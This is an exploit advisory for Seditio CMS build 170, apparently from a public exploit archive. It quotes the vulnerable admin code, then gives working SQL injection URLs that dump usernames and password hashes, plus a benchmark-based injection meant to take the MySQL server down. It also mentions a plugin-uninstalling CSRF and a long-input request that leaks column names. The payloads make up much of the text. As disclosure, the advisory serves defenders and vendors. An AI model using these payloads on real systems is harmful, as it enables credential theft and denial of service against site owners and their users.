============================================================ Vulnerable Software: Seditio 170 (seditio-build170.20120302) Downloaded from:http://www.neocrome.net/files/code/seditio-build170.20120302.rar (MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar) ============================================================ Tested: *php.ini MAGIC_QUOTES_GPC OFF* Safe mode off /* OS: Windows XP SP2 (32 bit) Apache: 2.2.21.0 PHP Version: 5.2.17.17 mysql> select version() -> ; +-----------+ | version() | +-----------+ | 5.5.21 | +-----------+ */ =========================================================== Vuln Desc: Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability. Note:*For successfull exploitation requires administrative authentication to system.* //system/core/admin/admin.hits.inc.php //Vulnerable Code Section $f = sed_import('f','G','TXT'); $v = sed_import('v','G','TXT'); if ($f=='year' || $f=='month') { $adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")"); $sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC"); Exploit: Extract user(s)/admin(s)/moder(s) details: http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271-- http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271-- http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271-- http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271-- Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection) http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271-- Note: It can be mixed with CSRF especially if you have no any access to system as admin. In eg:

Print screen: http://s019.radikal.ru/i625/1204/6d/842088135393.png Seditio 170 (seditio-build170.20120302) also prone to CSRF (Cross Site Request Forgery) vulnerability because it doesn't checks request validity throught $_GET request and as result we can silently Uninstall/stop/pause/start plugins which may cause: Data loss,functionality loss. =========================================================================================== /*Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.*/ //Works for me.

============================================================================================== Information Disclosure: Try to post in inputs very long string. Application will expose column.names which is not acceptable anymore from security consideration. In eg: Client Side validation: Location: http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP Post data: userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA& ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP Error: Title of your site 2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1 Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161) Same Info/Path disclosures still unfixed.(from Seditio 161). ("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161) I notified about it here+ to vendor too but it still unfixed in 170.20120302 too. ====================PLEASE==HELP TO KEEP SEDITIO SECURE================================= +++++++Greetz to all++++++++++ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com and to all AA Team. ++++++++++++++++++++++++++++++ Thank you. /AkaStep ^_^